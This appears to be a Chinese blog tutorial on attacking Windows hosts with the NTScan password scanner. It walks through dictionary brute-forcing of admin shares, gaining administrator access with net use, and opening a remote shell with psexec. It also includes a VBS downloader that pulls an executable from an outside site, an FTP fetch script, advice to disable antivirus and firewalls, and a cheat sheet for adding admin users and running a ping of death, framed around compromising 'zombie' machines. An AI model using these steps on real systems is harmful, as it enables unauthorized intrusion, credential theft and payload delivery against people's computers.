Windows系统口令扫描之——使用NTScan扫描Windows口令

口令扫描攻击有两种方式

  • 一种是不知道用户名称,猜测性暴力攻击
  • 另一种是通过各种工具或手段收集用户信息,利用收集的信息实施攻击

口令扫描获取用户的账号名称方法

  1. 利用网络工具获取:
    可以利用目标主机的finger命令查询功能获取信息。当使用finger命令时,主机系统会将保存的用户资料(用户名,登陆时间)显示在终端或计算机上

  2. 通过网络获取用户相关信息:
    用户通常使用相同的名字注册电子邮箱、blog即论坛

  3. 获取主机中的习惯性账号:
    习惯性账号主要包括操作系统账号和应用软件账号。在操作系统账号中,又分为windows账号和linux/nuix账号。在linux/nuix操作系统中。用户信息存放在passwd中,口令经过des加密放在shadow中

  4. 通过网络监听得到用户口令

  5. 通过软件获取:
    在获得一定的shell后,可以通过PwBump、LC5、NTCrack、MT、ADUMP等工具获取系统账号命令

使用NTScan扫描Windows口令

前提:用户开启admin$文件共享

运行regedit,进入下面键值:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters,新建AutoShareWks,以及AutoShareServer两个键值,选择REG_DWORD格式,赋值为1HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa新建restrictanonymous,dword,赋值1。然后重启,通过运行CMD命令进入命令行模式,再运行net share,在共享列表中会看到Admin$、C$\IPC$

Windows口令扫描攻击主要针对某个IP地址或者网段进行口令扫描,实质是通过139、445等端口尝试建立连接,利用DOS命令“net use \ipaddress\admin$ “password” /u:user”,只不过是通过程序实现而已

01设置NTScan

运行NTScan,在NTScan中一班指需要设置开始IP地址和结束IP地址,其他设置均采用默认值
如图在这里插入图片描述

(1)如果是在肉机上进行口令扫描,由于语言版本不同,若操作系统不支持响应语言的显示,就有可能显示为乱码,这时只能凭对系统的熟悉程度进行设置。
(2)在NTScan中有IPC、SMB和WMI 3种扫描方式,第一种和第三种扫描口令较为有效,第二种主要用来扫描共享文件。利用IPC$可以与目标主机建立一个空的连接而无需用户名和密码,还可以得到目标主机上的用户列表。SMB(服务器信息块)协议是一种IBM协议,用于在计算机间共享文件、打印机、串口等。SMB协议可以用在因特网的TCP/IP协议之上,也可以用在其他网络协议,如IPX和NetBEUI之上。
(3)WMI(windows管理规范)是windows的一项核心管理技术。作为一种规范和基础结构,通过WMI可以访问、配置、管理和监视几乎所有Windows资源

02执行扫描

在NTScan运行界面单击“开始”按钮
在这里插入图片描述

(1)NTScan扫描口令与字典有关,其原理就是使用字典中的口令与实际口令进行对比,如果相同即可建立连接,即爆破成功,破解成功后会在下方显示。
(2)NTScan的字典为NT_pass.dic,用户名为NT_user.dic,可以根据实际情况对字典文件和用户文件的内容进行修改。
(3)NTScan扫描结束后,会在NTScan程序的当前目录下生成一个NTScan.txt文件,该文件用于记录扫描结果。
(4)在NTScan中还有一些辅助功能,如单击“右键”可以执行“cmd”命令,单击左键后可以执行“连接”、“打开远程登录”及“映射网络驱动器”等命令。

03实时控制

在DOS命令提示符下输入net use \\192.168.38.134\ipc$ "win2003luo" /u:administrator命令获取主机的管理员权限
在这里插入图片描述

04执行Psexec命令

输入psexec \\192.168.38.134 cmd命令,获取一个DOSShell

安装psexec.exe:将psexec.exe文件放在windows\system32目录下并运行即可

在这里插入图片描述

以上两步可以合并。在DOS命令提示符下输入psexec \\192.168.38.134 u administrator -pwin2003luo cmd获取DOS下的shell

05从远端查看被入侵计算机的端口开放情况

使用sfind -p 192.168.38.134命令一次查看远程主机端口开放情况
在这里插入图片描述

06上传文件
07查看主机基本信息

代码:systeminfo
在这里插入图片描述

说明:

(1)可以使用一下VBS脚本命令上传文件
echo with wscript:if .arguments.count^<2 then .quit:end if >dl.vbe
echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>dl.vbe
echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then quit >>dl.vbe
echo web.responseboby:aso.savetofile .arguments(1),2:end with >>dl.vbe
cscript dl.vbe http://www.mymuma.com/software/systeminfo.exe systeminfo.exe

(2)如果不能通过执行VBS脚本上传文件,可以通过执行FTP命令上传文件
echo open 192.168.1.1 >b
echo ftp>>b
echo ftp>>b
echo bin>>b
echo get systeminfo.exe >>b
echo bye >>b
ftp -s:b

(3)上传文件时,建议先使用“dir filename”命令查看文件是否存在,上传后再次通过“dir filename”命令查看文件是否上传成功

ntscan是一个扫描器,可以扫描没有密码保护的管理员共享,先到配置文件中填写猜测的用户名和密码,扫描过程中右侧出现的是扫描日志。 ntscan变态扫描器 NTscan变态扫描器为什么报毒? 一般杀毒软件会把NTscan报告成黑客程序,导致NTscan无法运行。 如果想正常运行NTscan,必须把杀毒软件关掉,同时把安装的防火墙也关掉。 NTscan变态扫描器命令详解 net use \\ip\ipc$ " " /user:" " 建立IPC空链接 net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: net use h: \\ip\c$ 登陆后映射对方C:到本地为H: net use \\ip\ipc$ /del 删除IPC链接 net use h: /del 删除映射对方到本地的为H:的映射 net user 用户名 密码 /add 建立用户 net user guest /active:yes 激活guest用户 net user 查看有哪些用户 net user 帐户名 查看帐户的属性 net localgroup administrators 用户名 /add 把"用户"添加到管理员中使其具有管理员权限,注意:administrator后加s用复数 net start 查看开启了哪些服务 net start 服务名 开启服务;(如:net start telnet, net start schedule) net stop 服务名 停止某服务 net time \\目标ip 查看对方时间 net time \\目标ip /set 设置本地计算机时间与"目标IP"主机的时间同步,加上参数/yes可取消确认信息 net view 查看本地局域网内开启了哪些共享 net view \\ip 查看对方局域网内开启了哪些共享 net config 显示系统网络设置 net logoff 断开连接的共享 net pause 服务名 暂停某服务 net send ip "文本信息" 向对方发信息 net ver 局域网内正在使用网络连接类型和信息 net share 查看本地开启的共享 net share ipc$ 开启ipc$共享 net share ipc$ /del 删除ipc$共享 net share c$ /del 删除C:共享 net user guest 12345 用guest用户登陆后用将密码改为12345 net password 密码 更改系统登陆密码 netstat -a 查看开启了哪些端口,常用netstat -an netstat -n 查看端口的网络连接情况,常用netstat -an netstat -v 查看正在进行的工作 netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况) netstat -s 查看正在使用的所有协议使用情况 nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写 tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:"-w数字"用于设置超时间隔。 ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:"-l[空格]数据包大小";"-n发送数据次数";"-t"指一直ping。 ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数"/all"显示全部配置信息 tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如"DEL/AR *.*"表示删除当前目录下所有只读文件,"DEL/A-S *.*"表示删除当前目录下除系统文件以外的所有文件 NTscan为什么扫不出弱口令? 如果是内网的用户,只能扫内网的ip,其次你的机子要突破线程限制,改到一千左右,NTSCAN,X-SCAN和流光扫描器这些现在只能扫本地ip了。所以假如你是用135端口抓鸡的话,现在只能抓本地的,本地ip可以打开“运行”输入ipconfig 可以看到,想扫外网的话,用路由器映射端口。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值